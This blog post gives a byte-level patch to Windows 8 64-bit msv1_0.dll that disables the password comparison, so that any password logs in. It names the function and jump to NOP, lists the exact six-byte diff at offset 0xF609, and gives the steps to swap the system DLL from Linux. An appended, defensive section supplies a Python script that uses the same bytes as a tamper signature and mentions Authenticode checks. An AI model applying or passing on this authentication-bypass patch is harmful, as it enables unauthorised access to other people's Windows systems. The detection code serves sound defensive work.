Channel: Astr0baby's not so random thoughts _____ rand() % 100;

Fun with msv1_0.dll in Windows 8 64bit


I’ve always wondered what this logo reminds me of… wait, it was an old Greek state flag from 1822 – 1969. The colors were used in the Greek revolution when they fought the Ottoman Empire.

OK, now we move on to the latest OS from Microsoft -> Windows 8 Pro 64-bit. There seems to be a big void in the documentation of the various functions inside this library, which makes debugging harder, but not impossible. I had to go manually through all the functions to check for our RtlCompareMemory friends and find the correct section that needs to be patched. The information on the Microsoft Symbol Server for the PDB of msv1_0.dll seems to be incomplete (or at least this is how I understand it).

So after a careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate:

It is: sub_18001014C

Next we look for the RtlCompareMemory call and patch the jnz that follows it with NOPs. In this case the block starts at loc_1800101F0 and the jump is jnz loc_18001B4B7.

So we open it in Hex view and modify the bytes of the jnz loc_18001B4B7 instruction.

Produce a diff and patch the file, reboot to Linux, copy over C:\windows\system32\msv1_0.dll, and reboot; any password should then work to log in to the system.

msv1_0.dll
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.
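From the defender's side, the diff above is also a ready-made integrity signature: six bytes at file offset 0xF609 that originally decode to a `jnz rel32` (opcode 0F 85, displacement A8 B2 00 00) and read as six NOPs (0x90) once the file is tampered with. The following script is an added example, not part of the original post or of ida_patcher: it parses the ida_patcher-style diff format shown on the page (a filename line, then one `OFFSET: ORIGINAL PATCHED` line per byte) and reports whether a file image still carries the original bytes, carries the patch, or matches neither. The offsets and bytes are the page's; the sample images are constructed dummies, not a real msv1_0.dll, so the script runs offline.

```python
"""Parse an ida_patcher-style byte diff and check a file image for the patch.

Added example, not from the original post. The only page-specific values are
the six offsets and bytes taken from the diff; the sample images built by
make_sample() are constructed dummies, not a real msv1_0.dll.
"""
import re
from typing import List, Tuple

# The diff exactly as given on the page: filename, then "OFFSET: ORIGINAL PATCHED".
# 0F 85 is the two-byte opcode of jnz rel32 and A8 B2 00 00 its displacement,
# so the six bytes are one conditional jump replaced by six NOPs (0x90).
PAGE_DIFF = """\
msv1_0.dll
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90
"""

Entry = Tuple[int, int, int]  # (file offset, original byte, patched byte)
_LINE = re.compile(r"^([0-9A-Fa-f]+):\s*([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})$")


def parse_diff(text: str) -> Tuple[str, List[Entry]]:
    """Return the target filename and the per-byte entries of the diff."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty diff")
    entries: List[Entry] = []
    for ln in lines[1:]:
        m = _LINE.match(ln)
        if not m:
            raise ValueError(f"unrecognised diff line: {ln!r}")
        entries.append((int(m[1], 16), int(m[2], 16), int(m[3], 16)))
    return lines[0], entries


def classify(image: bytes, entries: List[Entry]) -> str:
    """Compare the bytes at the diff offsets against both columns of the diff.

    'original'     every byte equals the pre-patch value
    'patched'      every byte equals the post-patch value (the NOP run)
    'out_of_range' the image is too small for one of the offsets
    'mismatch'     anything else: a different build where these offsets hold
                   unrelated code, or a partially applied patch
    """
    if any(off >= len(image) for off, _, _ in entries):
        return "out_of_range"
    if all(image[off] == orig for off, orig, _ in entries):
        return "original"
    if all(image[off] == new for off, _, new in entries):
        return "patched"
    return "mismatch"


def check_file(path: str, diff_text: str = PAGE_DIFF) -> str:
    """Classify an on-disk file, e.g. a copy of msv1_0.dll taken for analysis."""
    _, entries = parse_diff(diff_text)
    with open(path, "rb") as fh:
        return classify(fh.read(), entries)


def make_sample(patched: bool, size: int = 0x10000) -> bytes:
    """Constructed dummy image: int3 filler with the page's six bytes at 0xF609."""
    buf = bytearray(b"\xcc" * size)
    seq = b"\x90" * 6 if patched else bytes.fromhex("0F85A8B20000")
    buf[0xF609:0xF609 + len(seq)] = seq
    return bytes(buf)


if __name__ == "__main__":
    name, sig = parse_diff(PAGE_DIFF)
    print(f"signature for {name}: {len(sig)} bytes at 0x{sig[0][0]:X}")
    for label, img in (("clean sample", make_sample(False)),
                       ("tampered sample", make_sample(True))):
        print(f"{label}: {classify(img, sig)}")
```

The offsets are only valid for the exact build the author analysed, which is why `classify` distinguishes `mismatch` from `patched` instead of treating any non-original byte as tampering. Because any byte change also breaks the file's Authenticode signature, a signature check (for example `Get-AuthenticodeSignature` in PowerShell) flags the tampered DLL as well; a byte-level comparison like this one additionally shows exactly what was changed.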
